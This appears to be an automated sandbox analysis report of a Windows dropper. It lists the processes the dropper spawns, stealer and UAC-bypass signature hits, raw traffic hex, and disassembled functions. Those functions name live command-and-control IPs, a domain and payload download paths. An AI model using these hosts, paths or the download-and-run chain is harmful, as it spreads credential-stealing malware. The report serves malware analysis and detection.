Apr 27, 2024 01:32:21.090419054 CEST	1289	IN	Data Raw: 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d c4 33 d2 e8 33 f8 ff ff c7 45 c4 00 00 00 00 c6 45 fc 0c 8b 4d d4 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 45 d8 85 c0 74 12 f0 0f c1 70 20 4e 75 0a 8b 4d d8 33 d2 e8 f3 Data Ascii: tA uM33EEMt@tjEtp NuM3EEMt@tj(p}GGGG31zG`%Z/GQWEhGMEE~r>?u3
Apr 27, 2024 01:32:21.090468884 CEST	1289	IN	Data Raw: 3b f3 ff ff c7 45 88 00 00 00 00 c6 45 fc 1c 8b 4d 98 85 c9 74 15 8b 01 8b 40 08 ff d0 8b c8 85 c9 74 08 8b 01 6a 01 8b 00 ff d0 8b 4d 9c 85 c9 74 13 8b c6 f0 0f c1 41 20 75 0a 8b 4d 9c 33 d2 e8 fa f2 ff ff c7 45 9c 00 00 00 00 c6 45 fc 1d 8b 4d Data Ascii: ;EEMt@tjMtA uM3EEMt@tjMtA uM3EEMt@tjMtA uM3xEEMt@tjE
Apr 27, 2024 01:32:21.090540886 CEST	1289	IN	Data Raw: 0f 00 00 00 c7 41 10 00 00 00 00 50 c6 01 00 e8 62 05 00 00 e8 cd 32 05 00 83 c4 18 83 7c 24 1c 00 76 57 ff 15 cc c9 47 00 8b 44 24 1c 40 50 6a 02 ff 15 c0 c9 47 00 8b f0 85 f6 74 3d 83 7c 24 20 10 8d 54 24 0c 8b 4c 24 1c 0f 43 54 24 0c 41 51 52 Data Ascii: APb2\|$vWGD$@PjGt=\|$ T$L$CT$AQRVGPGVGVjGVGD$ r@L$Pt$D$ D$D$\|$8D$$D$4CD$$GhG6'@'@#(@(@)@)@
Apr 27, 2024 01:32:21.090584040 CEST	1289	IN	Data Raw: 10 89 7e 10 72 0e 8b 06 5f c6 00 00 8b c6 5e 5b 5d c2 08 00 8b c6 5f 5e 5b c6 00 00 5d c2 08 00 8b c6 85 ff 74 0b 57 53 50 e8 5f 71 05 00 83 c4 0c 83 7e 14 10 89 7e 10 72 0f 8b 06 c6 04 38 00 8b c6 5f 5e 5b 5d c2 08 00 8b c6 c6 04 38 00 5f 8b c6 Data Ascii: ~r_^[]_^[]tWSP_q~~r8_^[]8_^[]hvG>US]VMWC;}+;G;uG99FF~rQj_^[]Qj_^[]9~s$vW
Apr 27, 2024 01:32:21.090610981 CEST	1289	IN	Data Raw: 3b 46 10 76 04 85 c0 75 9b 8b 4e 10 3b c1 77 19 89 46 10 83 7e 14 10 72 08 8b 0e c6 04 01 00 eb 14 8b ce c6 04 01 00 eb 0c 2b c1 8b ce 6a 00 50 e8 ff fd ff ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 0c 00 cc cc cc cc cc cc cc Data Ascii: ;FvuN;wF~r+jPMdY_^[]UAPuuuu;y]3]UjhpFdPSVWlG3PEdeuEv'^;v<+
Apr 27, 2024 01:32:21.090682983 CEST	1289	IN	Data Raw: e8 99 30 05 00 83 c4 04 8d 4d e4 e8 d5 2e 05 00 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b 4d ec 33 cd e8 93 43 05 00 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b f1 0f 57 c0 8d 46 04 50 c7 06 ac c1 46 00 66 0f d6 00 Data Ascii: 0M.MdY_^[M3C]UVWFPFfEPQLF^]VNt$F+PQFFF^Vt#F+PQFF^UjhFdPPVWl
Apr 27, 2024 01:32:21.261603117 CEST	1289	IN	Data Raw: c7 00 00 00 00 00 6a 01 8b 01 ff 10 85 f6 75 e9 6a 00 6a 00 c7 47 24 00 00 00 00 e8 9c 6b 05 00 cc cc 56 8b f1 8b 4e 40 85 c9 74 24 8b 46 48 2b c1 c1 f8 03 50 51 e8 b7 03 00 00 c7 46 40 00 00 00 00 c7 46 44 00 00 00 00 c7 46 48 00 00 00 00 8b 4e Data Ascii: jujjG$kVN@t$FH+PQF@FDFHN4t$F<+PQF4F8F<N$t$F,+PQF$F(F,Nt$F+PQ6FFFNt$F+PQFF

Target ID:	0
Start time:	01:31:07
Start date:	27/04/2024
Path:	C:\Users\user\Desktop\VucRf0jboS.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\VucRf0jboS.exe"
Imagebase:	0x400000
File size:	441'857 bytes
MD5 hash:	5CD97A765E0C9463F57769117DB519FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	01:31:13
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5qk.0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5qk.0.exe"
Imagebase:	0x400000
File size:	294'400 bytes
MD5 hash:	17342752EC286810D28AA4F324C3E8E5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2493025545.000000000406A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000003.1758935505.0000000005CA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2493025545.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:31:28
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
Imagebase:	0xb90000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1994802884.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:31:31
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000006.00000002.2326661645.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2324902407.0000000004A36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:31:31
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	01:31:56
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5qk.3.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5qk.3.exe"
Imagebase:	0x400000
File size:	4'866'096 bytes
MD5 hash:	397926927BCA55BE4A77839B1C44DE6E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:31:56
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168
Imagebase:	0x610000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:32:00
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x110000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	01:32:00
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe"
Imagebase:	0xb90000
File size:	2'469'936 bytes
MD5 hash:	9FB4770CED09AAE3B437C1C6EB6D7334
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.2322322233.00000000039CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:32:01
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2525694505.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2524262276.0000000004C35000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	01:32:01
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	01:32:16
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
Imagebase:	0x20ee5400000
File size:	59'721'128 bytes
MD5 hash:	8E9C467EAC35B35DA1F586014F29C330
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3024035894.0000020EEB370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3027055139.0000020EEB550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000002.3007357797.0000020E900C3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2395167883.0000020EE543B000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000011.00000000.2395167883.0000020EE863B000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	18
Start time:	01:32:18
Start date:	27/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x490000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.2523771095.0000000000902000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	01:32:21
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	01:32:21
Start date:	27/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	01:32:21
Start date:	27/04/2024
Path:	C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe"
Imagebase:	0x580000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 47%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	23
Start time:	01:32:22
Start date:	27/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7516 -s 2108
Imagebase:	0x610000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	2.7%
Signature Coverage:	13%
Total number of Nodes:	1113
Total number of Limit Nodes:	16

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
185.172.128.228, xrefs: 0042677C
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
chunked, xrefs: 004269E7, 00426A2D, 004275F8
GET , xrefs: 00426AF5, 00426B17, 00426B31
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
Content-Length, xrefs: 00426853, 004268ED, 004275AB
/ping.php?substr=%s, xrefs: 0042677D
POST , xrefs: 00426AA7, 00426AD5, 00426B39

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

P, xrefs: 00425855
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
P, xrefs: 004250AB
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
two, xrefs: 00424B5F, 00424B7A, 00424D9B
.zip, xrefs: 00425B5D, 00425B7F
P, xrefs: 00425EE3
P, xrefs: 004254F5
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
.exe, xrefs: 004258B1, 004258D3
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
Installed, xrefs: 004251FF, 0042525D
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
.exe, xrefs: 00425F26, 00425F48
P, xrefs: 00425B10
SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
sub=([\w-]{1,255}), xrefs: 00424AA2
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
\run.exe, xrefs: 00425BD0, 00425C28
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com$sub=([\w-]{1,255})$two
API String ID: 2531350358-3033353151
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.2360754496.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VucRf0jboS.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 041E5BD6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 041E5BFE
Module32First.KERNEL32(00000000,00000224), ref: 041E5C1E

Memory Dump Source

Source File: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 041E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e5000_VucRf0jboS.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 8b7b800f224c7716825e143119289c101a3e71810b9bc1425cc6cf348cba0cd3
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 3BF0C239100B10BBE7203AF79CCCA7E76FEAF48628F140568E646924C0DB70F8864660

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

